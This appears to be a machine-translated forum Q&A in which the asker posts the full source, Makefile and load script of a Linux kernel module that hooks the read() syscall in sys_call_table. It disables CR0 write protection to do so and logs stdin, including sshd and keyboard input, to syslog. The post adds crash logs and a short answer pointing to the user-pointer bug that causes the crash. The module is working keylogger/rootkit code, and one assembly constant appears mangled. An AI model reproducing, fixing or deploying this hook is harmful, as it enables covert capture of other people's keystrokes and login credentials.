- 您不应在堆栈上为内核模块分配数组。内核 space 的堆栈非常有限。您必须在堆上分配。
if ( strlen( buf ) > 0 )
您正在调用 strlen()
的论点是:
不在内核地址space
可能不指向 null-terminated 字符串
可能根本不指向映射内存
不要那样做。使用 read()
中的 return 值来确定读取了多少数据,并使用 copy_from_user()
从用户指针复制数据。
我的 LKM 劫持 stdin/sshd 输入:https://pastebin.com/RChpbt9G
# uname -a
Linux kali 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
我在两台计算机上都使用最新的 kali2019.2。 https://www.kali.org/downloads/
- 第一台电脑 i5-2500K - 好的。
- 第二台电脑 i7-6700HQ(硬件名称:Acer NG-G9-592-52LP/Mustang_SLS,BIOS V1.05 03/01/2016)-
gaming laptop
- 崩溃...
生成文件:
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)
TARGET = hacked_read
obj-m := $(TARGET).o
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
@rm -f *.o .*.cmd .*.flags *.mod.c *.order
@rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
@rm -fR .tmp*
@rm -rf .tmp_versions
LKM代码:
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <linux/delay.h>
#include <linux/cred.h>
#include <linux/sched.h>
#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
#include <asm/atomic.h>
#define PID_MAX 32768
#define MODULE_NAME "hacked_read"
#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.2" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail@domain.com>" );
static DEFINE_SPINLOCK( mLock );
static unsigned long ( *original_read ) ( const struct pt_regs *regs );
void **sct;
static unsigned long flags; // irq flags
static atomic_t LOCK_NUMBER_ATOM = ATOMIC_INIT(0);
static unsigned long long LOCK_NUMBER_ATOM_VAL;
static bool pids[ PID_MAX ];
static inline void rw_enable( void ) {
asm volatile ( "pushq %rax \n"
"movq %cr0, %rax \n"
"andq [=12=]xfffffffffffeffff, %rax \n"
"movq %rax, %cr0 \n"
"popq %rax " );
}
static inline uint64_t getcr0(void) {
register uint64_t ret = 0;
asm volatile (
"movq %%cr0, %0\n"
:"=r"(ret)
);
return ret;
}
static inline void rw_disable( register uint64_t val ) {
asm volatile(
"movq %0, %%cr0\n"
:
:"r"(val)
);
}
static void* find_sym( const char *sym ) {
static unsigned long faddr = 0; // static !!!
// ----------- nested functions are a GCC extension ---------
int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
if( 0 == strcmp( (char*)data, sym ) ) {
faddr = addr;
return 1;
} else return 0;
};// --------------------------------------------------------
kallsyms_on_each_symbol( symb_fn, (void*)sym );
return (void*)faddr;
}
static unsigned long hacked_read_test( const struct pt_regs *regs ) {
unsigned long r = 1;
unsigned int fd = regs->di;
char *buf = (char*) regs->si;
atomic_inc( &LOCK_NUMBER_ATOM );
pids[ task_pid_nr( current ) ] = true;
r = original_read( regs );
if ( fd == 0 ) { // fd == 0 --> stdin (sh, sshd)
if ( strlen( buf ) > 0 )
info( "hacked_read: %c\n", buf[ 0 ] );
}
atomic_dec( &LOCK_NUMBER_ATOM );
pids[ task_pid_nr( current ) ] = false;
return r;
}
int hacked_read_init( void ) {
register uint64_t cr0;
int cpu;
sct = find_sym( "sys_call_table" );
original_read = (void *)sct[ __NR_read ];
for_each_present_cpu( cpu ) {
spin_lock_irqsave( &mLock, flags );
cr0 = getcr0( );
rw_enable( );
sct[ __NR_read ] = hacked_read_test;
rw_disable( cr0 );
spin_unlock_irqrestore( &mLock, flags );
}
info( "Module was loaded\n" );
return 0;
}
// Module exit: puts the original read() entry back, then polls every 5 s
// until no task is still inside hacked_read_test, printing the in-flight
// count and the flagged pids while it waits.
// NOTE(review): the counter is only incremented inside the hook, so in
// principle a task already dispatched through the old table entry but not
// yet past atomic_inc() is invisible to this wait; the loop narrows the
// window but does not close it.
// NOTE(review): LOCK_NUMBER_ATOM_VAL is unsigned long long but is printed
// with %lld, and i is unsigned int but printed with %d; %llu / %u match.
void hacked_read_exit( void ) {
register uint64_t cr0;
int cpu;
unsigned int i;
for_each_present_cpu( cpu ) { // cpu is unused; same store repeated each pass
spin_lock_irqsave( &mLock, flags );
cr0 = getcr0( );
rw_enable( );
sct[__NR_read] = original_read;
rw_disable( cr0 );
spin_unlock_irqrestore( &mLock, flags );
}
LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
while ( LOCK_NUMBER_ATOM_VAL != 0 ) {
info( "Locked. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL );
for( i = 0; i < PID_MAX; i++ ) {
if ( pids[ i ] ) {
info( "Locked. pid = %d\n", i );
}
}
msleep( 5000 ); // sleeps, so this must not run in atomic context
LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
}
info( "Open. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL);
info( "Module was unloaded\n" );
}
// Registers the entry and exit functions above with the module loader.
module_init( hacked_read_init );
module_exit( hacked_read_exit );
在 i5-2500K 上它工作正常，键盘的每一次输入都会正确地记录到 /var/log/syslog 中。然而在 i7-6700HQ 上加载这个模块后，它就会失控并把键盘卡死，所以我改用下面的方式来测试它：
#!/bin/bash
cp -v /mnt/opt2/usr_src/programming/cpp/hacked_read/hacked_read.ko /lib/modules/4.19.0-kali4-amd64/
depmod
modprobe hacked_read
sleep 10
rmmod hacked_read
我在 /var/log/syslog 中看到了这个:https://pastebin.com/D7YS3z0c
Jun 13 16:00:24 localhost kernel: [ 1624.899161] hacked_read: loading out-of-tree module taints kernel.
Jun 13 16:00:24 localhost kernel: [ 1624.899538] hacked_read: Module was loaded
Jun 13 16:00:24 localhost systemd[1]: atopacct.service: Main process exited, code=killed, status=9/KILL
Jun 13 16:00:24 localhost systemd[1]: atopacct.service: Failed with result 'signal'.
Jun 13 16:00:24 localhost kernel: [ 1624.906589] BUG: unable to handle kernel paging request at 00007fffc3497560
Jun 13 16:00:24 localhost kernel: [ 1624.906592] PGD 80000002dcbe3067 P4D 80000002dcbe3067 PUD 2e3bab067 PMD 2df01c067 PTE 8000000450ae7867
Jun 13 16:00:24 localhost kernel: [ 1624.906597] Oops: 0001 [#1] SMP PTI
Jun 13 16:00:24 localhost kernel: [ 1624.906599] CPU: 4 PID: 15874 Comm: atopacctd Tainted: G O 4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:24 localhost kernel: [ 1624.906601] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:24 localhost kernel: [ 1624.906604] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:24 localhost kernel: [ 1624.906605] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:24 localhost kernel: [ 1624.906607] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:24 localhost kernel: [ 1624.906609] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906610] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:24 localhost kernel: [ 1624.906611] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906612] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:24 localhost kernel: [ 1624.906613] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906615] FS: 00007f28ab3d6540(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906617] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:24 localhost kernel: [ 1624.906618] CR2: 00007fffc3497560 CR3: 00000002f2e56002 CR4: 00000000003606e0
Jun 13 16:00:24 localhost kernel: [ 1624.906619] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906621] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:24 localhost kernel: [ 1624.906622] Call Trace:
Jun 13 16:00:24 localhost kernel: [ 1624.906627] do_syscall_64+0x53/0x100
Jun 13 16:00:24 localhost kernel: [ 1624.906630] entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:24 localhost kernel: [ 1624.906632] RIP: 0033:0x7f28ab2fe761
Jun 13 16:00:24 localhost kernel: [ 1624.906634] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:24 localhost kernel: [ 1624.906635] RSP: 002b:00007fffc3497528 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906637] RAX: ffffffffffffffda RBX: 0000000000000009 RCX: 00007f28ab2fe761
Jun 13 16:00:24 localhost kernel: [ 1624.906638] RDX: 0000000000003e80 RSI: 00007fffc3497560 RDI: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906639] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906641] R10: 0000000000000040 R11: 0000000000000246 R12: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906642] R13: 00007fffc3497550 R14: 00007fffc349b6c0 R15: 00007fffc349b478
Jun 13 16:00:24 localhost kernel: [ 1624.906643] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:24 localhost kernel: [ 1624.906676] crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:24 localhost kernel: [ 1624.906712] intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:24 localhost kernel: [ 1624.906718] CR2: 00007fffc3497560
Jun 13 16:00:24 localhost kernel: [ 1624.906719] ---[ end trace a09f35b7d83f68d8 ]---
Jun 13 16:00:24 localhost kernel: [ 1624.906722] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:24 localhost kernel: [ 1624.906723] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:24 localhost kernel: [ 1624.906725] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:24 localhost kernel: [ 1624.906726] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906727] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:24 localhost kernel: [ 1624.906728] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906730] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:24 localhost kernel: [ 1624.906731] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906732] FS: 00007f28ab3d6540(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906734] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:24 localhost kernel: [ 1624.906735] CR2: 00007fffc3497560 CR3: 00000002f2e56002 CR4: 00000000003606e0
Jun 13 16:00:24 localhost kernel: [ 1624.906736] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906737] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:25 localhost kernel: [ 1625.433687] BUG: unable to handle kernel paging request at 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.433695] PGD 80000002e39d0067 P4D 80000002e39d0067 PUD 2e332d067 PMD 2d13bc067 PTE 80000002b4f9a867
Jun 13 16:00:25 localhost kernel: [ 1625.433708] Oops: 0001 [#2] SMP PTI
Jun 13 16:00:25 localhost kernel: [ 1625.433716] CPU: 3 PID: 21500 Comm: grep Tainted: G D O 4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:25 localhost kernel: [ 1625.433719] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:25 localhost kernel: [ 1625.433729] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:25 localhost kernel: [ 1625.433734] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:25 localhost kernel: [ 1625.433738] RSP: 0018:ffff9f1dc5f4ff20 EFLAGS: 00010246
Jun 13 16:00:25 localhost kernel: [ 1625.433744] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433747] RDX: 0000000000000000 RSI: ffff8eb7ef52c020 RDI: 0000000000000001
Jun 13 16:00:25 localhost kernel: [ 1625.433751] RBP: 0000556becd76d67 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433755] R10: ffff9f1dc5f4feb0 R11: 0000000000000001 R12: 00000000000000d8
Jun 13 16:00:25 localhost kernel: [ 1625.433758] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433763] FS: 00007f578746fb80(0000) GS:ffff8eb7f1ac0000(0000) knlGS:0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433767] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:25 localhost kernel: [ 1625.433771] CR2: 0000556becd76d67 CR3: 00000002b792c006 CR4: 00000000003606e0
Jun 13 16:00:25 localhost kernel: [ 1625.433775] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433779] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:25 localhost kernel: [ 1625.433782] Call Trace:
Jun 13 16:00:25 localhost kernel: [ 1625.433795] do_syscall_64+0x53/0x100
Jun 13 16:00:25 localhost kernel: [ 1625.433804] entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:25 localhost kernel: [ 1625.433810] RIP: 0033:0x7f578757c761
Jun 13 16:00:25 localhost kernel: [ 1625.433815] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:25 localhost kernel: [ 1625.433819] RSP: 002b:00007ffd300aaaa8 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433824] RAX: ffffffffffffffda RBX: 000000000000e000 RCX: 00007f578757c761
Jun 13 16:00:25 localhost kernel: [ 1625.433828] RDX: 000000000000e000 RSI: 0000556becd76d67 RDI: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433832] RBP: 000000000000e000 R08: 000000000000000f R09: 0000000000019008
Jun 13 16:00:25 localhost kernel: [ 1625.433835] R10: 0000000000000004 R11: 0000000000000246 R12: 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.433839] R13: 0000000000000000 R14: 0000556becd6c800 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433843] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:25 localhost kernel: [ 1625.433931] crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:25 localhost kernel: [ 1625.434030] intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:25 localhost kernel: [ 1625.434046] CR2: 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.434051] ---[ end trace a09f35b7d83f68d9 ]---
Jun 13 16:00:25 localhost kernel: [ 1625.434058] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:25 localhost kernel: [ 1625.434063] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:25 localhost kernel: [ 1625.434066] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:25 localhost kernel: [ 1625.434071] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434074] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:25 localhost kernel: [ 1625.434078] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434081] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:25 localhost kernel: [ 1625.434085] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434090] FS: 00007f578746fb80(0000) GS:ffff8eb7f1ac0000(0000) knlGS:0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434093] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:25 localhost kernel: [ 1625.434097] CR2: 0000556becd76d67 CR3: 00000002b792c006 CR4: 00000000003606e0
Jun 13 16:00:25 localhost kernel: [ 1625.434101] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434105] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:35 localhost kernel: [ 1635.419417] BUG: unable to handle kernel paging request at 00007ffd57fa5d6f
Jun 13 16:00:35 localhost kernel: [ 1635.419427] PGD 80000002dc983067 P4D 80000002dc983067 PUD 2d80bd067 PMD 2f3d2d067 PTE 80000003254c4867
Jun 13 16:00:35 localhost kernel: [ 1635.419442] Oops: 0001 [#3] SMP PTI
Jun 13 16:00:35 localhost kernel: [ 1635.419450] CPU: 4 PID: 21549 Comm: atop Tainted: G D O 4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:35 localhost kernel: [ 1635.419454] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:35 localhost kernel: [ 1635.419464] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:35 localhost kernel: [ 1635.419470] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:35 localhost kernel: [ 1635.419475] RSP: 0018:ffff9f1dc6437f20 EFLAGS: 00010246
Jun 13 16:00:35 localhost kernel: [ 1635.419481] RAX: fffffffffffffe00 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419485] RDX: 0000000000000000 RSI: 0000000000000257 RDI: ffff8eb632d9fc28
Jun 13 16:00:35 localhost kernel: [ 1635.419489] RBP: 00007ffd57fa5d6f R08: 0000714c40000000 R09: 0000000000025d19
Jun 13 16:00:35 localhost kernel: [ 1635.419494] R10: 0000000000026611 R11: 0000017cc5933f1e R12: fffffffffffffe00
Jun 13 16:00:35 localhost kernel: [ 1635.419497] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419503] FS: 00007fa66b6b9d40(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419508] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:35 localhost kernel: [ 1635.419512] CR2: 00007ffd57fa5d6f CR3: 00000002e31fe005 CR4: 00000000003606e0
Jun 13 16:00:35 localhost kernel: [ 1635.419517] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419521] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:35 localhost kernel: [ 1635.419524] Call Trace:
Jun 13 16:00:35 localhost kernel: [ 1635.419538] do_syscall_64+0x53/0x100
Jun 13 16:00:35 localhost kernel: [ 1635.419548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:35 localhost kernel: [ 1635.419555] RIP: 0033:0x7fa66b7cd761
Jun 13 16:00:35 localhost kernel: [ 1635.419560] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:35 localhost kernel: [ 1635.419565] RSP: 002b:00007ffd57fa5d38 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419571] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fa66b7cd761
Jun 13 16:00:35 localhost kernel: [ 1635.419575] RDX: 0000000000000001 RSI: 00007ffd57fa5d6f RDI: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419579] RBP: 000056148ad79380 R08: 0000000000000000 R09: 000000000000ffff
Jun 13 16:00:35 localhost kernel: [ 1635.419583] R10: 0000000000000008 R11: 0000000000000246 R12: 00000000000003e8
Jun 13 16:00:35 localhost kernel: [ 1635.419587] R13: 000056148ad93380 R14: 000056148ad3bd20 R15: 00005614890723a6
Jun 13 16:00:35 localhost kernel: [ 1635.419592] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:35 localhost kernel: [ 1635.419690] crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:35 localhost kernel: [ 1635.419800] intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:35 localhost kernel: [ 1635.419817] CR2: 00007ffd57fa5d6f
如果你读过我之前关于这个 LKM 的两个问题，就会知道还有另外两个问题，它们都已经在上面这段新代码中解决了。
